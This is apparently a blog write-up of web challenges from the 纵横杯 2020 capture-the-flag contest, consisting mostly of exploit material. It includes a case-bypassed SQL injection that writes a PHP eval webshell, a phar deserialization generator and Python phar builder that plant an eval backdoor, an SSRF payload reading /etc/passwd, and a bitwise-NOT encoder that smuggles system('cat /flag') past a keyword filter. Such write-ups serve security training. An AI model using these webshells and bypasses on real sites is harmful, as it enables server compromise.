纵横杯

2020-12-28 10:12:00
ctf - wp - 纵横杯

easyci

Dumping the Apache configuration file through the SQL injection gives the web root: /var/sercet/html/

Write a shell with `into outfile`; the keyword blacklist is case-sensitive, so mixed case (uNion sElect) bypasses it. This only works when the MySQL user has the FILE privilege and secure_file_priv allows writing to that directory.

password=a&username=-1' uNion sElect 1,'<?php eval($_POST[1]);?>' into outfile '/var/sercet/html/9.php'--+

hello_php

www.zip leaks the source. index.php passes user input straight to a filesystem function, so phar deserialization is possible:

if(isset($_GET['img'])&&file_exists($_GET['img'])){?>

The gadget is the Config class from class.php; phar generator:

<?php
// Generator for the malicious phar. Run with phar.readonly=0
// (php -d phar.readonly=0 gen.php), otherwise new Phar() cannot write.
class Config{
    public $title;
    public $comment;
    public $logo_url;
    public function __construct(){
        global $title;
        global $comment;
        global $logo_url;
        // title closes the quoted config value and appends a backdoor
        $this->title= $title = "';@eval(\$_POST[1]);#";
        $this->comment = $comment;
        $this->logo_url = $logo_url;
    }

}

@unlink("test.phar");
$phar = new Phar("test.phar");                    // the extension must be .phar while generating
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");     // minimal stub
$o = new Config;
$phar->setMetadata($o);                           // the object is serialized into the manifest
$phar->addFromString("test.txt", "test");         // at least one file entry is required
$phar->stopBuffering();

?>
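The same archive the generator above produces can be assembled by hand, which shows exactly where the serialized object lives and what PHP checks before it unserializes it. The builder below is an added example, not code from the writeup or the challenge: the Config gadget is assumed to have the three public properties shown above and is emitted only as a serialized string, and the layout (stub, manifest, file contents, SHA1 signature block) follows the phar format as implemented in PHP's ext/phar.

```python
"""Hand-built phar carrying a serialized Config object in its manifest.

Added example, not code from the writeup or the challenge. It writes the
same kind of archive the PHP generator above produces, with the layout
the phar reader in PHP's ext/phar expects: stub, manifest (file count,
API version, flags, alias, serialized metadata, file entries), file
contents, then a SHA1 signature block. The Config gadget is assumed to
look like the page's class (three public properties) and is emitted
only as a serialized string; nothing here executes PHP.
"""
import hashlib
import struct
import time
import zlib

PHAR_API_VERSION = b"\x11\x00"  # API 1.1.0 without directories, big-endian
PHAR_HDR_SIGNATURE = 0x10000    # global flag: signature block present
PHAR_SIG_SHA1 = 0x0002          # signature type stored before "GBMB"


def php_serialize(value):
    """Serialize the subset of PHP values this gadget needs: str, NULL,
    and (class_name, {public_prop: value}) tuples standing in for objects."""
    if value is None:
        return b"N;"
    if isinstance(value, str):
        raw = value.encode()
        return b's:%d:"%s";' % (len(raw), raw)
    if isinstance(value, tuple):
        cls, props = value
        body = b"".join(php_serialize(k) + php_serialize(v) for k, v in props.items())
        return b'O:%d:"%s":%d:{%s}' % (len(cls), cls.encode(), len(props), body)
    raise TypeError("unsupported type %r" % type(value))


def config_gadget():
    """Serialized form of the page's Config object: title breaks out of a
    quoted config value and appends a backdoor, the other two are NULL."""
    return php_serialize(("Config", {
        "title": "';@eval($_POST[1]);#",
        "comment": None,
        "logo_url": None,
    }))


def build_phar(metadata, files, stub=b"<?php __HALT_COMPILER(); ?>\r\n", alias=b""):
    """Return phar bytes whose manifest metadata is `metadata` (already
    serialized). `files` maps name -> content; at least one is required,
    PHP rejects a manifest with zero entries."""
    entries, contents = b"", b""
    now = int(time.time())
    for name, data in files.items():
        entries += struct.pack("<I", len(name)) + name
        entries += struct.pack("<IIIIII",
                               len(data), now, len(data),   # uncompressed, mtime, compressed
                               zlib.crc32(data) & 0xFFFFFFFF,
                               0o644,                       # entry flags: perms, no compression
                               0)                           # per-file metadata length
        contents += data
    manifest = (struct.pack("<I", len(files)) + PHAR_API_VERSION
                + struct.pack("<I", PHAR_HDR_SIGNATURE)
                + struct.pack("<I", len(alias)) + alias
                + struct.pack("<I", len(metadata)) + metadata
                + entries)
    # PHP pads the manifest by one byte when the low byte of its length
    # would read as a newline right after " ?>" (bug #65028); mirror that.
    if (len(manifest) & 0xFF) in (0x0A, 0x0D):
        manifest += b"\x00"
    body = stub + struct.pack("<I", len(manifest)) + manifest + contents
    # signature: SHA1 over everything before it, then type, then magic
    return body + hashlib.sha1(body).digest() + struct.pack("<I", PHAR_SIG_SHA1) + b"GBMB"


def read_phar_metadata(blob):
    """Walk the manifest the way the phar reader does and return the raw
    serialized metadata, i.e. the bytes PHP unserializes on load."""
    pos = blob.index(b"__HALT_COMPILER();") + len(b"__HALT_COMPILER();")
    if blob[pos:pos + 3] == b" ?>":
        pos += 3
    if blob[pos:pos + 2] == b"\r\n":
        pos += 2
    elif blob[pos:pos + 1] == b"\n":
        pos += 1
    pos += 4 + 4 + 2 + 4                  # manifest length, file count, version, flags
    alias_len, = struct.unpack_from("<I", blob, pos)
    pos += 4 + alias_len
    meta_len, = struct.unpack_from("<I", blob, pos)
    return blob[pos + 4:pos + 4 + meta_len]


def signature_ok(blob):
    """Check the trailing signature block the way PHP does."""
    sig_type, = struct.unpack_from("<I", blob, len(blob) - 8)
    return (blob[-4:] == b"GBMB" and sig_type == PHAR_SIG_SHA1
            and hashlib.sha1(blob[:-28]).digest() == blob[-28:-8])


if __name__ == "__main__":
    with open("test.phar", "wb") as f:
        f.write(build_phar(config_gadget(), {b"test.txt": b"test"}))
```

Metadata is unserialized at manifest-parse time, which is why a mere file_exists() on a phar:// path is enough to fire the gadget. Before using the output, confirm PHP accepts it with `php -r 'var_dump((new Phar("test.phar"))->getMetadata());'`; without class.php loaded that prints a __PHP_Incomplete_Class, which is the harmless way to see the archive parses.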

Run two Burp Intruder attacks, one against a local instance and one against the remote target; take the file name obtained locally and test it remotely.

index.php?img=phar:///var/www/html/static/<filename>

disable_functions is set, but AntSword's (蚁剑) GC UAF bypass gets around it directly.

ezcms

Log in to the admin panel as admin; the password admin868 comes from the www.zip source leak.

The collection (采集) feature in the back end has an SSRF; as before, a scheme that does not exist gets handled like file://, which bypasses the check:

1.html:

<test123><a href="httpssss://../../../../../../../etc/passwd">123</a></test123>

Test the collector against 1.html:

大家一起来审代码

Source code leak.

Enter the back end at /adm1n/ with admin/admin.

Get a shell through the WeChat (微信) settings page in the back end. The input is filtered with $$arg=preg_replace("/a|e|i|o|u|s|t/i","",$$arg); so encoding the strings with bitwise NOT (~) bypasses it.

POST /adm1n/admin_weixin.php?action=set HTTP/1.1
Host: eci-2ze2xgy7q3q9edsdmd7w.cloudeci1.ichunqiu.com
Content-Length: 1261
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://eci-2ze2xgy7q3q9edsdmd7w.cloudeci1.ichunqiu.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://eci-2ze2xgy7q3q9edsdmd7w.cloudeci1.ichunqiu.com/adm1n/admin_weixin.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: UM_distinctid=1746b9caf38693-09a14450333cf8-15306251-13c680-1746b9caf39ab2; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=7fa6d0a1c78ce02642071b4aa8511786f7b96bdd; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1608730799,1608820977,1608947441,1608967589; PHPSESSID=fccfe38c7ba32cec553d6eb1ad0f47a3; __jsluid_h=31bcf1d6a1527084ce154181595f143f; __51cke__=; __tins__21018907=%7B%22sid%22%3A%201608970730807%2C%20%22vd%22%3A%204%2C%20%22expires%22%3A%201608972789490%7D; __51laig__=4; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1608971221
Connection: close

isopen=n&url=https%3A%2F%2Fwww.seacms.net&title=%E6%B5%B7%E6%B4%8B%E5%BD%B1%E8%A7%86&ckmov_url=https%3A%2F%2Fwww.seacms.net%2Fvip.php%3Furl%3D+&dpic=https%3A%2F%2Fwww.seacms.net%2Fapi%2Fwx.jpg&follow=%E6%84%9F%E8%B0%A2%E6%82%A8%E7%9A%84%E5%85%B3%E6%B3%A8%E3%80%82&noc=%E6%9A%82%E6%97%A0%E4%BD%A0%E8%A6%81%E7%9A%84%E5%86%85%E5%AE%B9%E3%80%82&help=%E8%BF%99%E6%98%AF%E5%B8%AE%E5%8A%A9%E4%BF%A1%E6%81%AF%E3%80%82&topage=d&dwz=n&dwztoken=dwztoken&sql_num=15&msg1a=%E5%85%B3%E9%94%AE%E8%AF%8D1&msg1b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B91&msg2a=%E5%85%B3%E9%94%AE%E8%AF%8D2&msg2b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B92%3Ca+href%3D%27http%3A%2F%2Fwww.seacms.net%27%3E%E9%93%BE%E6%8E%A5%E6%B5%8B%E8%AF%95%3C%2Fa%3E%EF%BC%8C%E6%B5%8B%E8%AF%95%E7%BB%93%E6%9D%9F%E3%80%82&msg3a=%E5%85%B3%E9%94%AE%E8%AF%8D3&msg3b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B93&msg4a=%E5%85%B3%E9%94%AE%E8%AF%8D4&msg4b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B94&msg5a=%E5%85%B3%E9%94%AE%E8%AF%8D5&msg5b=%3Ca+href%3D%27https%3A%2F%2Fwww.seacms.net%27%3E%E9%93%BE%E6%8E%A5%3C%2Fa%3E1231");$z='%8C%86%8C%8B%9A%92';$p=~'%9C%9E%8B%DF%D0%99%93%9E%98';$z=~$z;$z($p);//

Then request admin/weixin.php to trigger it; the two NOT-encoded literals in the request decode to system and cat /flag.
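What the tail of that request does, as an added example that is not part of the writeup: a Python model of the filter quoted above, an encoder that produces the ~'%..' form, and a decoder that recovers the two strings from the captured payload. The variable names $z and $p are kept because z and p are not in the filtered set.

```python
"""Bitwise-NOT bypass for the vowel filter in the WeChat settings handler.

Added example, not code from the writeup. The filter is the one quoted
on the page, preg_replace("/a|e|i|o|u|s|t/i", "", $value), so a plain
system('cat /flag') cannot survive it. PHP's ~ on a string flips every
byte, so ~'<high bytes>' contains no ASCII letters at all after URL
decoding, passes the filter unchanged, and evaluates to the original
string when the injected config file is later included.
"""
import re
from urllib.parse import unquote_to_bytes

FILTER = re.compile(rb"a|e|i|o|u|s|t", re.IGNORECASE)


def vowel_filter(value: bytes) -> bytes:
    """Python model of the page's preg_replace filter. It runs on decoded
    bytes, which is what PHP sees after it parses the POST body."""
    return FILTER.sub(b"", value)


def not_encode(text: str) -> str:
    """URL-encode the bytewise NOT of text, e.g. 'system' -> '%8C%86%8C%8B%9A%92'."""
    return "".join("%%%02X" % ((~b) & 0xFF) for b in text.encode())


def not_decode(encoded: str) -> str:
    """Undo not_encode: the value PHP gets once ~ is applied to the literal."""
    return bytes((~b) & 0xFF for b in unquote_to_bytes(encoded)).decode()


def build_payload(func: str, arg: str) -> str:
    """Tail to append to the injected config value, in the shape of the
    captured request: close the quoted string and statement, call
    func(arg) through NOT-encoded names, comment out whatever follows."""
    return "\");$z='%s';$p=~'%s';$z=~$z;$z($p);//" % (not_encode(func), not_encode(arg))


def survives_filter(payload: str) -> bool:
    """True when the filter leaves the URL-decoded payload byte-for-byte intact."""
    raw = unquote_to_bytes(payload)
    return vowel_filter(raw) == raw


def decode_captured(payload: str):
    """Pull every NOT-encoded quoted literal out of a payload tail and decode it."""
    return [not_decode(m) for m in re.findall(r"'((?:%[0-9A-Fa-f]{2})+)'", payload)]


if __name__ == "__main__":
    tail = build_payload("system", "cat /flag")
    print(tail)
    print(decode_captured(tail), survives_filter(tail))
```

Any function name and argument can be fed to build_payload; survives_filter is the check to run before sending, since a stray s, t or vowel anywhere outside the encoded literals (for example in a variable name) is silently deleted by the filter and breaks the PHP that gets written.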



Original post on HhhM's blog; please credit the source when reposting.



CopyRight © 2019-2020 HhhM